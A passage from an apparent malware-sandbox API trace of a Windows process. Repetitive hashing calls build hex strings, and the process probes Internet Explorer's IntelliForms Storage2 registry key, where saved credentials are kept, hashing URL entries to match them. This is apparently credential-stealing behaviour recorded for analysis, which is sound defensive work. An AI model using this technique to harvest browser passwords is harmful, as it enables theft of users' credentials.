[0249.370] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d09c0 [0249.370] lstrcpyW (in: lpString1=0xd1d09c0, lpString2="EB16D475AE" | out: lpString1="EB16D475AE") returned="EB16D475AE" [0249.370] lstrcatW (in: lpString1="EB16D475AE", lpString2="7B" | out: lpString1="EB16D475AE7B") returned="EB16D475AE7B" [0249.370] LocalFree (hMem=0x5d324b0) returned 0x0 [0249.370] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DB") returned 2 [0249.370] lstrlenW (lpString="EB16D475AE7B") returned 12 [0249.370] lstrlenW (lpString="DB") returned 2 [0249.370] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1cfcb0 [0249.370] lstrcpyW (in: lpString1=0xd1cfcb0, lpString2="EB16D475AE7B" | out: lpString1="EB16D475AE7B") returned="EB16D475AE7B" [0249.370] lstrcatW (in: lpString1="EB16D475AE7B", lpString2="DB" | out: lpString1="EB16D475AE7BDB") returned="EB16D475AE7BDB" [0249.370] LocalFree (hMem=0xd1d09c0) returned 0x0 [0249.370] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2E") returned 2 [0249.370] lstrlenW (lpString="EB16D475AE7BDB") returned 14 [0249.370] lstrlenW (lpString="2E") returned 2 [0249.370] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d0650 [0249.370] lstrcpyW (in: lpString1=0xd1d0650, lpString2="EB16D475AE7BDB" | out: lpString1="EB16D475AE7BDB") returned="EB16D475AE7BDB" [0249.370] lstrcatW (in: lpString1="EB16D475AE7BDB", lpString2="2E" | out: lpString1="EB16D475AE7BDB2E") returned="EB16D475AE7BDB2E" [0249.370] LocalFree (hMem=0xd1cfcb0) returned 0x0 [0249.370] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AD") returned 2 [0249.370] lstrlenW (lpString="EB16D475AE7BDB2E") returned 16 [0249.370] lstrlenW (lpString="AD") returned 2 [0249.370] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d05a0 [0249.370] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="EB16D475AE7BDB2E" | out: lpString1="EB16D475AE7BDB2E") returned="EB16D475AE7BDB2E" [0249.370] lstrcatW (in: lpString1="EB16D475AE7BDB2E", lpString2="AD" | out: lpString1="EB16D475AE7BDB2EAD") returned="EB16D475AE7BDB2EAD" [0249.370] LocalFree (hMem=0xd1d0650) returned 0x0 [0249.370] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="61") returned 2 [0249.370] lstrlenW (lpString="EB16D475AE7BDB2EAD") returned 18 [0249.370] lstrlenW (lpString="61") returned 2 [0249.370] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd2179f0 [0249.370] lstrcpyW (in: lpString1=0xd2179f0, lpString2="EB16D475AE7BDB2EAD" | out: lpString1="EB16D475AE7BDB2EAD") returned="EB16D475AE7BDB2EAD" [0249.370] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD", lpString2="61" | out: lpString1="EB16D475AE7BDB2EAD61") returned="EB16D475AE7BDB2EAD61" [0249.370] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.370] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DF") returned 2 [0249.370] lstrlenW (lpString="EB16D475AE7BDB2EAD61") returned 20 [0249.370] lstrlenW (lpString="DF") returned 2 [0249.370] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217570 [0249.370] lstrcpyW (in: lpString1=0xd217570, lpString2="EB16D475AE7BDB2EAD61" | out: lpString1="EB16D475AE7BDB2EAD61") returned="EB16D475AE7BDB2EAD61" [0249.370] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61", lpString2="DF" | out: lpString1="EB16D475AE7BDB2EAD61DF") returned="EB16D475AE7BDB2EAD61DF" [0249.370] LocalFree (hMem=0xd2179f0) returned 0x0 [0249.370] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="97") returned 2 [0249.370] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF") returned 22 [0249.371] lstrlenW (lpString="97") returned 2 [0249.371] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd218230 [0249.371] lstrcpyW (in: lpString1=0xd218230, lpString2="EB16D475AE7BDB2EAD61DF" | out: lpString1="EB16D475AE7BDB2EAD61DF") returned="EB16D475AE7BDB2EAD61DF" [0249.371] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF", lpString2="97" | out: lpString1="EB16D475AE7BDB2EAD61DF97") returned="EB16D475AE7BDB2EAD61DF97" [0249.371] LocalFree (hMem=0xd217570) returned 0x0 [0249.371] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="30") returned 2 [0249.371] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF97") returned 24 [0249.371] lstrlenW (lpString="30") returned 2 [0249.371] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217630 [0249.371] lstrcpyW (in: lpString1=0xd217630, lpString2="EB16D475AE7BDB2EAD61DF97" | out: lpString1="EB16D475AE7BDB2EAD61DF97") returned="EB16D475AE7BDB2EAD61DF97" [0249.371] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF97", lpString2="30" | out: lpString1="EB16D475AE7BDB2EAD61DF9730") returned="EB16D475AE7BDB2EAD61DF9730" [0249.371] LocalFree (hMem=0xd218230) returned 0x0 [0249.371] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="12") returned 2 [0249.371] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF9730") returned 26 [0249.371] lstrlenW (lpString="12") returned 2 [0249.371] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd2156a0 [0249.371] lstrcpyW (in: lpString1=0xd2156a0, lpString2="EB16D475AE7BDB2EAD61DF9730" | out: lpString1="EB16D475AE7BDB2EAD61DF9730") returned="EB16D475AE7BDB2EAD61DF9730" [0249.371] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF9730", lpString2="12" | out: lpString1="EB16D475AE7BDB2EAD61DF973012") returned="EB16D475AE7BDB2EAD61DF973012" [0249.371] LocalFree (hMem=0xd217630) returned 0x0 [0249.371] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="75") returned 2 [0249.371] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF973012") returned 28 [0249.371] lstrlenW (lpString="75") returned 2 [0249.371] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215f90 [0249.371] lstrcpyW (in: lpString1=0xd215f90, lpString2="EB16D475AE7BDB2EAD61DF973012" | out: lpString1="EB16D475AE7BDB2EAD61DF973012") returned="EB16D475AE7BDB2EAD61DF973012" [0249.371] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF973012", lpString2="75" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275") returned="EB16D475AE7BDB2EAD61DF97301275" [0249.371] LocalFree (hMem=0xd2156a0) returned 0x0 [0249.371] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D0") returned 2 [0249.371] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF97301275") returned 30 [0249.371] lstrlenW (lpString="D0") returned 2 [0249.371] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214ce0 [0249.371] lstrcpyW (in: lpString1=0xd214ce0, lpString2="EB16D475AE7BDB2EAD61DF97301275" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275") returned="EB16D475AE7BDB2EAD61DF97301275" [0249.371] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF97301275", lpString2="D0" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0") returned="EB16D475AE7BDB2EAD61DF97301275D0" [0249.371] LocalFree (hMem=0xd215f90) returned 0x0 [0249.371] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F2") returned 2 [0249.371] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF97301275D0") returned 32 [0249.371] lstrlenW (lpString="F2") returned 2 [0249.371] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd2155d0 [0249.371] lstrcpyW (in: lpString1=0xd2155d0, lpString2="EB16D475AE7BDB2EAD61DF97301275D0" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0") returned="EB16D475AE7BDB2EAD61DF97301275D0" [0249.371] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF97301275D0", lpString2="F2" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F2") returned="EB16D475AE7BDB2EAD61DF97301275D0F2" [0249.371] LocalFree (hMem=0xd214ce0) returned 0x0 [0249.371] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="16") returned 2 [0249.371] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF97301275D0F2") returned 34 [0249.371] lstrlenW (lpString="16") returned 2 [0249.371] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66960 [0249.371] lstrcpyW (in: lpString1=0x5d66960, lpString2="EB16D475AE7BDB2EAD61DF97301275D0F2" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F2") returned="EB16D475AE7BDB2EAD61DF97301275D0F2" [0249.372] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F2", lpString2="16" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216") returned="EB16D475AE7BDB2EAD61DF97301275D0F216" [0249.372] LocalFree (hMem=0xd2155d0) returned 0x0 [0249.372] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FD") returned 2 [0249.372] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF97301275D0F216") returned 36 [0249.372] lstrlenW (lpString="FD") returned 2 [0249.372] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d66ce0 [0249.372] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="EB16D475AE7BDB2EAD61DF97301275D0F216" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216") returned="EB16D475AE7BDB2EAD61DF97301275D0F216" [0249.372] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216", lpString2="FD" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216FD") returned="EB16D475AE7BDB2EAD61DF97301275D0F216FD" [0249.372] LocalFree (hMem=0x5d66960) returned 0x0 [0249.372] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C8") returned 2 [0249.372] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF97301275D0F216FD") returned 38 [0249.372] lstrlenW (lpString="C8") returned 2 [0249.372] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67840 [0249.372] lstrcpyW (in: lpString1=0x5d67840, lpString2="EB16D475AE7BDB2EAD61DF97301275D0F216FD" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216FD") returned="EB16D475AE7BDB2EAD61DF97301275D0F216FD" [0249.372] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216FD", lpString2="C8" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216FDC8") returned="EB16D475AE7BDB2EAD61DF97301275D0F216FDC8" [0249.372] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.372] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="54") returned 2 [0249.372] lstrlenW (lpString="EB16D475AE7BDB2EAD61DF97301275D0F216FDC8") returned 40 [0249.372] lstrlenW (lpString="54") returned 2 [0249.372] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d66260 [0249.372] lstrcpyW (in: lpString1=0x5d66260, lpString2="EB16D475AE7BDB2EAD61DF97301275D0F216FDC8" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216FDC8") returned="EB16D475AE7BDB2EAD61DF97301275D0F216FDC8" [0249.372] lstrcatW (in: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216FDC8", lpString2="54" | out: lpString1="EB16D475AE7BDB2EAD61DF97301275D0F216FDC854") returned="EB16D475AE7BDB2EAD61DF97301275D0F216FDC854" [0249.372] LocalFree (hMem=0x5d67840) returned 0x0 [0249.372] CryptDestroyHash (hHash=0x5d9e550) returned 1 [0249.372] CryptReleaseContext (hProv=0x5d39310, dwFlags=0x0) returned 1 [0249.372] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.372] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.372] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.372] LocalFree (hMem=0x5d66260) returned 0x0 [0249.372] RegEnumValueW (in: hKey=0x94c, dwIndex=0xa, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url13", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.372] StrStrIW (lpFirst="go.com", lpSrch="?") returned 0x0 [0249.372] StrStrIW (lpFirst="go.com", lpSrch="http://") returned 0x0 [0249.372] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d37a10) returned 1 [0249.373] CryptCreateHash (in: hProv=0x5d37a10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.373] lstrlenW (lpString="go.com") returned 6 [0249.373] CryptHashData (hHash=0x5d9e860, pbData=0x43ed4e0, dwDataLen=0xe, dwFlags=0x0) returned 1 [0249.373] CryptGetHashParam (in: hHash=0x5d9e860, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.373] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AF") returned 2 [0249.373] lstrlenW (lpString="") returned 0 [0249.373] lstrlenW (lpString="AF") returned 2 [0249.373] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b4610 [0249.373] lstrcpyW (in: lpString1=0xd1b4610, lpString2="" | out: lpString1="") returned="" [0249.373] lstrcatW (in: lpString1="", lpString2="AF" | out: lpString1="AF") returned="AF" [0249.373] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="44") returned 2 [0249.373] lstrlenW (lpString="AF") returned 2 [0249.373] lstrlenW (lpString="44") returned 2 [0249.373] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d322d0 [0249.373] lstrcpyW (in: lpString1=0x5d322d0, lpString2="AF" | out: lpString1="AF") returned="AF" [0249.373] lstrcatW (in: lpString1="AF", lpString2="44" | out: lpString1="AF44") returned="AF44" [0249.373] LocalFree (hMem=0xd1b4610) returned 0x0 [0249.373] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AD") returned 2 [0249.373] lstrlenW (lpString="AF44") returned 4 [0249.373] lstrlenW (lpString="AD") returned 2 [0249.373] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33770 [0249.373] lstrcpyW (in: lpString1=0x5d33770, lpString2="AF44" | out: lpString1="AF44") returned="AF44" [0249.373] lstrcatW (in: lpString1="AF44", lpString2="AD" | out: lpString1="AF44AD") returned="AF44AD" [0249.373] LocalFree (hMem=0x5d322d0) returned 0x0 [0249.373] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7D") returned 2 [0249.373] lstrlenW (lpString="AF44AD") returned 6 [0249.373] lstrlenW (lpString="7D") returned 2 [0249.373] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.373] lstrcpyW (in: lpString1=0x5d33db0, lpString2="AF44AD" | out: lpString1="AF44AD") returned="AF44AD" [0249.373] lstrcatW (in: lpString1="AF44AD", lpString2="7D" | out: lpString1="AF44AD7D") returned="AF44AD7D" [0249.373] LocalFree (hMem=0x5d33770) returned 0x0 [0249.373] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="BA") returned 2 [0249.373] lstrlenW (lpString="AF44AD7D") returned 8 [0249.373] lstrlenW (lpString="BA") returned 2 [0249.373] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d324b0 [0249.373] lstrcpyW (in: lpString1=0x5d324b0, lpString2="AF44AD7D" | out: lpString1="AF44AD7D") returned="AF44AD7D" [0249.373] lstrcatW (in: lpString1="AF44AD7D", lpString2="BA" | out: lpString1="AF44AD7DBA") returned="AF44AD7DBA" [0249.373] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.373] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="3D") returned 2 [0249.374] lstrlenW (lpString="AF44AD7DBA") returned 10 [0249.374] lstrlenW (lpString="3D") returned 2 [0249.374] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0c80 [0249.374] lstrcpyW (in: lpString1=0xd1d0c80, lpString2="AF44AD7DBA" | out: lpString1="AF44AD7DBA") returned="AF44AD7DBA" [0249.374] lstrcatW (in: lpString1="AF44AD7DBA", lpString2="3D" | out: lpString1="AF44AD7DBA3D") returned="AF44AD7DBA3D" [0249.374] LocalFree (hMem=0x5d324b0) returned 0x0 [0249.374] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9B") returned 2 [0249.374] lstrlenW (lpString="AF44AD7DBA3D") returned 12 [0249.374] lstrlenW (lpString="9B") returned 2 [0249.374] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d12b0 [0249.374] lstrcpyW (in: lpString1=0xd1d12b0, lpString2="AF44AD7DBA3D" | out: lpString1="AF44AD7DBA3D") returned="AF44AD7DBA3D" [0249.374] lstrcatW (in: lpString1="AF44AD7DBA3D", lpString2="9B" | out: lpString1="AF44AD7DBA3D9B") returned="AF44AD7DBA3D9B" [0249.374] LocalFree (hMem=0xd1d0c80) returned 0x0 [0249.374] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9D") returned 2 [0249.374] lstrlenW (lpString="AF44AD7DBA3D9B") returned 14 [0249.374] lstrlenW (lpString="9D") returned 2 [0249.374] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d0bd0 [0249.374] lstrcpyW (in: lpString1=0xd1d0bd0, lpString2="AF44AD7DBA3D9B" | out: lpString1="AF44AD7DBA3D9B") returned="AF44AD7DBA3D9B" [0249.374] lstrcatW (in: lpString1="AF44AD7DBA3D9B", lpString2="9D" | out: lpString1="AF44AD7DBA3D9B9D") returned="AF44AD7DBA3D9B9D" [0249.374] LocalFree (hMem=0xd1d12b0) returned 0x0 [0249.374] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FD") returned 2 [0249.374] lstrlenW (lpString="AF44AD7DBA3D9B9D") returned 16 [0249.374] lstrlenW (lpString="FD") returned 2 [0249.374] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0ff0 [0249.374] lstrcpyW (in: lpString1=0xd1d0ff0, lpString2="AF44AD7DBA3D9B9D" | out: lpString1="AF44AD7DBA3D9B9D") returned="AF44AD7DBA3D9B9D" [0249.374] lstrcatW (in: lpString1="AF44AD7DBA3D9B9D", lpString2="FD" | out: lpString1="AF44AD7DBA3D9B9DFD") returned="AF44AD7DBA3D9B9DFD" [0249.374] LocalFree (hMem=0xd1d0bd0) returned 0x0 [0249.374] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="61") returned 2 [0249.374] lstrlenW (lpString="AF44AD7DBA3D9B9DFD") returned 18 [0249.374] lstrlenW (lpString="61") returned 2 [0249.374] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd218230 [0249.374] lstrcpyW (in: lpString1=0xd218230, lpString2="AF44AD7DBA3D9B9DFD" | out: lpString1="AF44AD7DBA3D9B9DFD") returned="AF44AD7DBA3D9B9DFD" [0249.374] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD", lpString2="61" | out: lpString1="AF44AD7DBA3D9B9DFD61") returned="AF44AD7DBA3D9B9DFD61" [0249.374] LocalFree (hMem=0xd1d0ff0) returned 0x0 [0249.375] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5B") returned 2 [0249.375] lstrlenW (lpString="AF44AD7DBA3D9B9DFD61") returned 20 [0249.375] lstrlenW (lpString="5B") returned 2 [0249.375] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217870 [0249.375] lstrcpyW (in: lpString1=0xd217870, lpString2="AF44AD7DBA3D9B9DFD61" | out: lpString1="AF44AD7DBA3D9B9DFD61") returned="AF44AD7DBA3D9B9DFD61" [0249.375] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD61", lpString2="5B" | out: lpString1="AF44AD7DBA3D9B9DFD615B") returned="AF44AD7DBA3D9B9DFD615B" [0249.375] LocalFree (hMem=0xd218230) returned 0x0 [0249.375] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A0") returned 2 [0249.375] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615B") returned 22 [0249.375] lstrlenW (lpString="A0") returned 2 [0249.375] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd2177b0 [0249.375] lstrcpyW (in: lpString1=0xd2177b0, lpString2="AF44AD7DBA3D9B9DFD615B" | out: lpString1="AF44AD7DBA3D9B9DFD615B") returned="AF44AD7DBA3D9B9DFD615B" [0249.375] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615B", lpString2="A0" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0") returned="AF44AD7DBA3D9B9DFD615BA0" [0249.375] LocalFree (hMem=0xd217870) returned 0x0 [0249.375] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B4") returned 2 [0249.375] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0") returned 24 [0249.375] lstrlenW (lpString="B4") returned 2 [0249.375] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217ff0 [0249.375] lstrcpyW (in: lpString1=0xd217ff0, lpString2="AF44AD7DBA3D9B9DFD615BA0" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0") returned="AF44AD7DBA3D9B9DFD615BA0" [0249.375] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0", lpString2="B4" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4") returned="AF44AD7DBA3D9B9DFD615BA0B4" [0249.375] LocalFree (hMem=0xd2177b0) returned 0x0 [0249.375] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="BA") returned 2 [0249.375] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0B4") returned 26 [0249.375] lstrlenW (lpString="BA") returned 2 [0249.375] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd2149a0 [0249.375] lstrcpyW (in: lpString1=0xd2149a0, lpString2="AF44AD7DBA3D9B9DFD615BA0B4" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4") returned="AF44AD7DBA3D9B9DFD615BA0B4" [0249.375] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0B4", lpString2="BA" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA") returned="AF44AD7DBA3D9B9DFD615BA0B4BA" [0249.375] LocalFree (hMem=0xd217ff0) returned 0x0 [0249.375] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="72") returned 2 [0249.375] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0B4BA") returned 28 [0249.375] lstrlenW (lpString="72") returned 2 [0249.375] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd214a70 [0249.375] lstrcpyW (in: lpString1=0xd214a70, lpString2="AF44AD7DBA3D9B9DFD615BA0B4BA" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA") returned="AF44AD7DBA3D9B9DFD615BA0B4BA" [0249.375] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA", lpString2="72" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA72") returned="AF44AD7DBA3D9B9DFD615BA0B4BA72" [0249.375] LocalFree (hMem=0xd2149a0) returned 0x0 [0249.375] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7B") returned 2 [0249.375] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0B4BA72") returned 30 [0249.375] lstrlenW (lpString="7B") returned 2 [0249.376] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214b40 [0249.376] lstrcpyW (in: lpString1=0xd214b40, lpString2="AF44AD7DBA3D9B9DFD615BA0B4BA72" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA72") returned="AF44AD7DBA3D9B9DFD615BA0B4BA72" [0249.376] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA72", lpString2="7B" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B" [0249.376] LocalFree (hMem=0xd214a70) returned 0x0 [0249.376] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="39") returned 2 [0249.376] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0B4BA727B") returned 32 [0249.376] lstrlenW (lpString="39") returned 2 [0249.376] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd214ce0 [0249.376] lstrcpyW (in: lpString1=0xd214ce0, lpString2="AF44AD7DBA3D9B9DFD615BA0B4BA727B" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B" [0249.376] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B", lpString2="39" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39" [0249.376] LocalFree (hMem=0xd214b40) returned 0x0 [0249.376] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AE") returned 2 [0249.376] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0B4BA727B39") returned 34 [0249.376] lstrlenW (lpString="AE") returned 2 [0249.376] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67840 [0249.376] lstrcpyW (in: lpString1=0x5d67840, lpString2="AF44AD7DBA3D9B9DFD615BA0B4BA727B39" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39" [0249.376] 